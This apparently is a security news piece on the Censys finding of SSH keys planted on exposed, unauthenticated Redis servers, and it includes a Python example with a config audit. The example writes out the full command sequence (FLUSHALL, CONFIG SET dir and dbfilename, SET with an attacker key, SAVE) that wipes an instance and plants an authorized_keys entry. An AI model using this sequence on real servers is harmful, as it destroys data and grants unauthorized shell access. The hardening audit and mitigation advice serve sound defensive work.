Information security analysts at Censys reported unauthorized SSH public key installation on 15,526 of the 31,239 unauthenticated Redis servers they observed.
Redis is the fourth most widely used database engine, after MySQL, PostgreSQL and Microsoft SQL Server. Unlike traditional relational databases, Redis was not designed with security in mind: it is meant to be accessed by trusted clients in trusted environments. The engine was originally intended only for internal, private communication, behind a firewall and never directly reachable from the Internet.
However, as practice has shown, some Redis instances were misconfigured: they were bound to a public interface, and some had no password authentication at all. In that situation an attacker needs no exploit. Any client can tell Redis where to write its database dump (CONFIG SET dir and CONFIG SET dbfilename) and then force a write with SAVE, so if the server runs as root (or as any account with a login shell and a home directory), the attacker can store a value containing their own SSH public key, have Redis dump it into that account's ~/.ssh/authorized_keys, and then log in to the victim's server directly over SSH. The resulting shell can be used, for example, to delete or steal data. To mitigate the threat, users are advised to enable client authentication, bind Redis only to internal network interfaces, prevent abuse of the CONFIG command by renaming it, and configure firewalls to accept Redis connections only from trusted hosts. In June, a similar problem was reported by computer security specialists from Akamai.
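The following is an added example, not code from the Censys report or from the Redis project. It shows the exact wire bytes an attacker sends to an unauthenticated Redis instance to write an authorized_keys file (encoded in Redis's RESP protocol so the sequence is visible without a live server), and a small audit of a redis.conf against the mitigations listed above. The public key, the key name "crackit", the home directory and both configuration files are constructed for the example.

```python
"""Unauthenticated Redis -> SSH authorized_keys write, and a redis.conf audit.

Added example; the key, key name, paths and config texts below are constructed.
"""


def resp(*args: str) -> bytes:
    """Encode one Redis command as a RESP array of bulk strings (what redis-cli sends)."""
    out = [f"*{len(args)}\r\n".encode()]
    for a in args:
        b = a.encode()
        out.append(f"${len(b)}\r\n".encode() + b + b"\r\n")
    return b"".join(out)


# Constructed example key; a real attacker supplies their own.
ATTACKER_PUBKEY = ("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyExampleKeyExampleKeyExampleKey"
                   " attacker@example")


def authorized_keys_write(pubkey: str, home: str = "/root") -> list[bytes]:
    """The command sequence that abuses CONFIG SET + SAVE on an open instance.

    The RDB framing around the value is binary, but sshd skips lines it cannot
    parse, and the surrounding newlines put the key on a line of its own.
    """
    return [
        resp("FLUSHALL"),                                   # dump will contain only our key
        resp("CONFIG", "SET", "dir", f"{home}/.ssh"),       # where the dump is written
        resp("CONFIG", "SET", "dbfilename", "authorized_keys"),
        resp("SET", "crackit", f"\n\n{pubkey}\n\n"),        # value that lands in the file
        resp("SAVE"),                                       # write it out synchronously
    ]


def parse_conf(text: str) -> tuple[dict, dict]:
    """Minimal redis.conf reader: last value wins; rename-command and user lines accumulate.
    Only lines whose first non-blank character is '#' are comments (as in Redis itself),
    so '#' inside a password or ACL hash is preserved."""
    settings: dict = {}
    renamed: dict = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, rest = line.partition(" ")
        key, rest = key.lower(), rest.strip()
        if key == "rename-command":
            orig, _, new = rest.partition(" ")
            renamed[orig.upper()] = new.strip().strip('"')
        elif key == "user":
            settings.setdefault("user", []).append(rest)
        else:
            settings[key] = rest
    return settings, renamed


def audit_conf(text: str) -> list[str]:
    """Return findings for the mitigations in the text (auth, bind, CONFIG rename).
    protected-mode is checked too (a Redis 3.2+ setting, beyond the article's list).
    Host firewall rules cannot be judged from redis.conf and are not checked here."""
    settings, renamed = parse_conf(text)
    findings = []
    bind = settings.get("bind", "")
    addrs = [a.lstrip("-") for a in bind.split()]        # "-::1" means optional address
    if not bind or any(a in ("0.0.0.0", "::", "*") for a in addrs):
        findings.append("bind: listens on all interfaces; bind to loopback or an internal address")
    if settings.get("protected-mode", "yes").lower() == "no":
        findings.append("protected-mode no: external unauthenticated clients are not refused")
    acl_has_pass = any(t.startswith((">", "#")) for u in settings.get("user", []) for t in u.split())
    if not settings.get("requirepass") and not acl_has_pass:
        findings.append("no authentication: set requirepass or an ACL user with a password")
    if "CONFIG" not in renamed:
        findings.append('CONFIG reachable: rename-command CONFIG "" (or an obscure name)')
    return findings


WEAK_CONF = """
# constructed: the exposed configuration the report describes
bind 0.0.0.0
protected-mode no
port 6379
"""

HARDENED_CONF = """
# constructed: the mitigations applied
bind 127.0.0.1 -::1
protected-mode yes
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
"""

if __name__ == "__main__":
    for cmd in authorized_keys_write(ATTACKER_PUBKEY):
        print(cmd)
    print("weak:", audit_conf(WEAK_CONF))
    print("hardened:", audit_conf(HARDENED_CONF))
```

With the hardened configuration the first CONFIG SET in the sequence fails (the command no longer exists), and without a password no client reaches it in the first place; the audit returns no findings for it and four for the weak file.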
They found a botnet with the signs of an SSH worm that attacks SSH servers to spread mining malware. According to Akamai, after gaining access the malware drops cryptocurrency miners and tries to hide its activity as far as possible, for example by monitoring processes and switching off the mining module when it detects a threat.